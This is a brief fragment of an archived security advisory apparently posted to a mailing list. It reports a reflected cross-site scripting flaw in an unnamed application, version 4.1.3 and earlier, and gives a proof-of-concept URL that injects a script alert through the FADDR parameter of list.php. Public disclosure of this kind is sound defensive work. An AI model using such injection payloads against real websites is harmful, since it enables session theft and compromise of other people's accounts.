Version: 4.1.3 and prior
-----------------------------
Proof of Concept
----------------
http://[host]/[path]/list.php?FADDR="><script>alert("XSS");</script>
katatafish (at) hush (dot) com
Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.